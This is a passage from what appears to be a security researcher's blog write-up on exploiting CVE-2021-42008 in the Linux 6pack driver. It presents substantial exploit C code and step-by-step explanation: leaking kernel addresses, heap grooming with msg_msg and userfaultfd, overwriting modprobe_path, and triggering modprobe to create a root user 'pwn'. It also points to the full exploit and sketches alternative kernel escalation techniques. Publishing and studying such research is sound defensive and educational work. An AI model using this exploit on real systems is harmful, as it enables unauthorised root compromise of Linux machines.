                modprobe_path = init_ipc_ns - 0x131040; // [4]
                return;
            }
        }
    }
}

[...]

leak_pointer(); // [1]

[...]

Since we don’t now which queue the message allocated after the sixpack structure belongs to, we use leak_pointer() [1] to read each message, until the init_ipc_ns pointer is found [2]. If we find the pointer, we obtain the correct queue id comparing the message content using find_message_queue() [3], and we finally compute the address of modprobe_path [4].

If the procedure fails, it means that none of our messages has been allocated after the sixpack structure. In this case we can simply launch the exploit again.

Here is a visual representation of what happens when we trigger the Out-Of-Bounds Read:

Now that we know the address of our target modprobe_path, we need to get an arbitrary write primitive. We could proceed initializing a new sixpack structure, but this would decrease the success rate of our exploit.

The question is: is there a way to reuse the sixpack structure we just corrupted? The answer is yes! Remember when we analyzed the tnc_init() function? Well, when a new sixpack channel is initialized, tnc_init() sets a timer of 5 seconds. When the timer fires, resync_tnc() is called:

static void resync_tnc(struct timer_list *t)
{
    struct sixpack *sp = from_timer(sp, t, resync_t);
    static char resync_cmd = 0xe8;

    /* clear any data that might have been received */

    sp->rx_count = 0; // [1]
    sp->rx_count_cooked = 0; // [2]

    /* reset state machine */

    sp->status = 1; // [3]

        [...]

    /* Start resync timer again -- the TNC might be still absent */
    mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [4]
}

As we can see, after 5 seconds, the receiver state is reset, meaning that sp->rx_count and sp->rx_count_cooked are set to 0 [1] [2] and sp->status to 1 [3], then the 5 seconds timer is re-initialized [4].

This means that we only need to wait 5 seconds until the receiver state is reset, then we will be able to reuse the structure to cause a second Out-Of-Bounds Write.

We can proceed initializing N_THREADS page fault handler threads (in our case N_THREADS is equal to 8):

void create_pfh_thread(int id, int ufd, void *page)
{
    struct pfh_args *args = (struct pfh_args *)malloc(sizeof(struct pfh_args));

    args->id = id;
    args->ufd = ufd;
    args->page = page;

    pthread_create(&pfh_tid[id], NULL, page_fault_handler, (void *)args);
}

[...]

for (int i = 0; i < N_THREADS; i++) // [1]
{
    mmap(pages[i], PAGE_SIZE*3, PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    ufd[i] = initialize_ufd(pages[i]);
}


for (int i = 0; i < N_THREADS; i++)
    create_pfh_thread(i, ufd[i], pages[i]); // [2]

[...]

First, we call mmap() for 8 times, and each time we map 3 pages of memory. For each iteration we start monitoring the second page using userfaultfd [1]. Then, we start 8 page fault handlers [2]. Each of these threads will handle a page fault for a specific page.

We can proceed allocating 8 messages in kmalloc-4k and the respective segments in kmalloc-32:

void alloc_msg_queue_B(int id)
{
    if ((qid_B[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void *allocate_msg(void *arg)
{
    int id = ((struct t_args *)arg)->id;
    void *page = ((struct t_args *)arg)->page;

    debug_printf("[Thread %d] Message buffer allocated at 0x%lx\n", id + 1, page + PAGE_SIZE - 0x10);
    alloc_msg_queue_B(id);

    memset(page, 0, PAGE_SIZE);
    ((uint64_t *)(page))[0xff0 / 8] = 1; // msg_msg.m_type = 1

    if (msgsnd(qid_B[id], page + PAGE_SIZE - 0x10, 0x1018, 0) < 0) // [4]
    {
        perror("[X] msgsnd");
        exit(1);
    }

    debug_printf("[Thread %d] Message sent!\n", id + 1);
}


void create_message_thread(int id, void *page)
{
    struct t_args *args = (struct t_args *)malloc(sizeof(struct t_args));

    args->id = id;
    args->page = page;

    pthread_create(&msg_tid[id], NULL, allocate_msg, (void *)args);
}

[...]

close_queue(qid_A[valid_qid]); // [1]
payload = generate_payload(modprobe_path - 0x8); // [2]

for (int i = 0; i < N_THREADS; i++)
    create_message_thread(i, pages[i]); // [3]

waitfor(6, "Waiting for resync_tnc callback..."); // [5]

[...]

First, we free the message allocated after the sixpack structure and respective segment, closing the queue [1]. This will create a hole in the heap, allowing us to allocate another message at the same location (because of freelist LIFO behavior).

We re-generate our malicious payload, this time using modprobe_path - 0x8 as target [2]. This will set the msg_msg.next pointer to modprobe_path - 0x8. Here we are subtracting 8 bytes from modprobe_path because the first QWORD of a segment must be NULL, otherwise load_msg() will try to access the next segment causing a crash.

Afterwards, we create 8 threads using create_message_thread() [3]. Each one of these threads will allocate a new message in kmalloc-4k. For each thread, we place the message buffer, right 0x10 bytes before the monitored page [4], this way the copy_from_user() call in load_msg() will cause a page fault, and we will be able suspend the copy operation.

Finally we sleep for 6 seconds [5], allowing resync_tnc() to reset the sixpack receiver state. All this will cause the following situation in memory:

As we can see, one of the messages has been allocated right after the sixpack structure. load_msg() caused a page fault, and we successfully suspended the copy operation. It is important to note that even in this case we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #Y.

We are ready to send our malicious payload over the sixpack channel:

[...]

puts("[*] Overwriting modprobe_path...");
write(ptmx, payload, WRITE_PAYLOAD_SIZE); // [1]

[...]

Once we send it [1], it will overwrite multiple fields of the msg_msg structure, including the next pointer. Now msg_msg->next, points to modprobe_path - 0x8:

We can finally release all page faults:

[...]

release_pfh = true;

[...]

The modprobe_path string will be overwritten with the path of our malicious program "/tmp/x":

In the final stage, we trigger the call to modprobe, and we verify if the new user with root privileges has been added:

[...]

system("/tmp/asd 2>/dev/null"); // [1]

if (!getpwnam("pwn")) // [2]
{
    puts("[X] Exploit failed, try again...");
    goto end;
}

puts("[+] We are root!");
system("rm /tmp/asd && rm /tmp/x");
system("su pwn");

[...]

First we execute a program with an unknown program header [1] forcing the kernel into calling __request_module() → call_modprobe() → call_usermodehelper_exec() and executing our malicious program, then we check if the user pwn [2] has been added using getpwnam(). If the user exists, we can use su pwn to become root, otherwise we simply need to launch the exploit again.

Here is the exploit in action:

The complete exploit can be found here:

CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

The exploit is designed and tested for Debian 11 - Kernel 5.10.0-8-amd64. If you want to port the exploit to other kernel versions, remember that the distance between sp->cooked_buf and the next object in memory may change.

Conclusion

In this article I showed how the techniques presented by FizzBuzz101 and me with Fire of Salvation and Wall Of Perdition can be used to exploit real vulnerabilities in the Linux Kernel.

There are many other valid approaches to exploit this vulnerability. For example, after Kernel 5.11, a first patch made userfaultfd completely inaccessible for unprivileged users, then a second patch restricted its usage in a way that only page faults from user-mode can be handled, so in the second stage, an attacker may simply use FUSE to delay page faults creating unprivileged user+mount namespaces, or may abuse discontiguous file mapping and scheduler behavior instead of using userfaultfd.

Another approach for the second stage may be to set msg_msg.next to the address of a previously leaked structure, for example seq_operations, subprocess_info, tty_struct and so on (check References for a list of exploitable kernel structures), and then free the message and its respective segment (now pointing to the target structure) using msgrcv() without the MSG_COPY flag.

This will result in an arbitrary free primitive. From here it is possible to cause a Use-After-Free and hijack the Kernel control flow overwriting a function pointer.

Another very interesting approach is the one used to exploit CVE-2021-22555.

As always, for any question or clarification, feel free to contact me (check About).

References

6pack

https://docs.kernel.org/networking/6pack.html

The TTY demystified

https://www.linusakesson.net/programming/tty/index.php

Jiffies in the Linux Kernel

https://cyberglory.wordpress.com/2011/08/21/jiffies-in-linux-kernel/

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)

modprobe_path

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

Exploitable kernel structures

https://bsauce.github.io/2021/09/26/kernel-exploit-%E6%9C%89%E7%94%A8%E7%9A%84%E7%BB%93%E6%9E%84%E4%BD%93/